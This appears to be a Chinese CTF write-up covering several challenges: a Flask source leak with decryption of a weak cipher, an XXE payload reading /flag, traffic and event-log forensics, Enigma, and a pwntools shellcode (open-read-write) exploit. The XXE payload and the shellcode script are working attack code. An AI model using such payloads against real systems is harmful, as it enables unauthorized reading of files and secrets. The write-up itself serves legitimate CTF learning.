情报收集

访问file?name=app.py，拿到源码

import os  
from flask import Flask, request, render_template  
from config import *  
# author: gamelab  
  
app = Flask(__name__)  
  
# 模拟敏感信息  
sensitive_info = SENSITIVE_INFO  
  
# 加密密钥  
encryption_key = ENCRYPTION_KEY  
  
def simple_encrypt(text, key):  
    encrypted = bytearray()  
    for i in range(len(text)):  
        char = text[i]  
        key_char = key[i % len(key)]  
        encrypted.append(ord(char) + ord(key_char))  
    return encrypted.hex()  
  
encrypted_sensitive_info = simple_encrypt(sensitive_info, encryption_key)  
  
# 模拟日志文件内容  
log_content = f"用户访问了 /secret 页面，可能试图获取 {encrypted_sensitive_info}"  
  
# 模拟隐藏文件内容  
hidden_file_content = f"解密密钥: {encryption_key}"  
  
# 指定安全的文件根目录  
SAFE_ROOT_DIR = os.path.abspath('/app')  
with open(os.path.join(SAFE_ROOT_DIR, 'hidden.txt'), 'w') as f:  
    f.write(hidden_file_content)  
  
@app.route('/')  
def index():  
    return render_template('index.html')  
  
@app.route('/logs')  
def logs():  
    return render_template('logs.html', log_content=log_content)  
  
@app.route('/secret')  
def secret():  
    return render_template('secret.html')  
  
@app.route('/file')  
def file():  
    file_name = request.args.get('name')  
    if not file_name:  
        return render_template('no_file_name.html')  
    full_path = os.path.abspath(os.path.join(SAFE_ROOT_DIR, file_name))  
    if not full_path.startswith(SAFE_ROOT_DIR) or 'config' in full_path:  
        return render_template('no_premission.html')  
    try:  
        with open(full_path, 'r') as f:  
            content = f.read()  
        return render_template('file_content.html', content=content)  
    except FileNotFoundError:  
        return render_template('file_not_found.html')  
  
if __name__ == '__main__':  
    app.run(debug=True, host='0.0.0.0')

审计发现有加密逻辑，根据源码找到密钥和密文。
alt text

text = "d9d1c4d9e0a48fcec8df61986964ac9794d692a8c5a4cba66a6b696ea0c693d698a68f9bc8da676596b4"  
key = "secret_key1547"  
def simple_encrypt(text, key):  
    encrypted = bytearray()  
    for i in range(len(text)):  
        char = text[i]  
        key_char = key[i % len(key)]  
        encrypted.append(ord(char) + ord(key_char))  
        print(f"Encrypted char: {char}, Key char: {key_char}, Hex: {hex(char)}")  
    return encrypted.hex()  
def simple_decrypt(encrypted_text, key):  
    decrypted = bytearray()  
    for i in range(0, len(encrypted_text), 2):  
        hex_char = encrypted_text[i:i+2]  
        char = chr(int(hex_char, 16))  
        key_char = key[i // 2 % len(key)]  
        decrypted.append(ord(char) - ord(key_char))  
        print(decrypted)  
    return decrypted.decode('utf-8')  
flag = simple_decrypt(text, key)  
print(flag)

XML

打XXE漏洞

<!DOCTYPE ANY [  
    <!ENTITY test SYSTEM "file:///flag">  
]>  
<user><username>&test;</username><password>123</password></user>

flowzip

流量包分析，翻着翻着就找到了。
alt text

ezEvtx

windows系统中，4663是访问文件成功的事件ID
alt text

Enigma

将他给的密文复制，
[ alt text
复制到本地cyberchef里面，使用Enigma解密即可

ShadowPhases

动态调试可出
alt text

RuneBreach

orw类型题

#!/usr/bin/env python3  
  
from pwn import *  
  
context.update(os='linux', arch='amd64', log_level='debug', terminal=['tmux', 'splitw', '-h'])  
  
sh = process("./chall")  
elf = ELF('./chall')  
# sh = remote("", )  
  
sh.sendlineafter(b"\nDefend? (y/N): ", b'N')  
sh.sendlineafter(b"\nDefend? (y/N): ", b'N')  
sh.sendlineafter(b"\nDefend? (y/N): ", b'N')  
sh.sendlineafter(b"\nDefend? (y/N): ", b'N')  
sh.recvuntil(b"\n[System] Game Over...\n")  
sh.recvuntil(b'Your place is mine now ')  
addr = int(sh.recv(14), 16)  
print("addr", hex(addr))  
shellcode = shellcraft.open('/flag') # 打开flag文件  
shellcode += shellcraft.read(3, addr, 0x50)  # 读取flag到mmap区域  
shellcode += shellcraft.write(1, addr, 0x50) # 将flag内容输出到标准输出  
  
sh.recvuntil(b'[BOSS] Say your last word to your territory: ')  
sh.sendline(asm(shellcode))  
sh.interactive()

还是比较菜，不太会哟

本地跑出来
alt text